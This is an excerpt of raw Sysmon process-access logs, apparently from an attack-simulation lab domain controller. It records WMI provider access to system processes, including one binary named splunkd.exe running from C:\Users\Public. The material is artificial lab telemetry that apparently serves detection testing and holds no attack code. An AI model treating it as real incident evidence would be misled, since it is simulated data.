13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004921Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004920Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004919Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004918Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004917Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004916Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004915Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004914Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004913Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004912Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004911Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004910Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004909Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004908Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004907Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004906Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 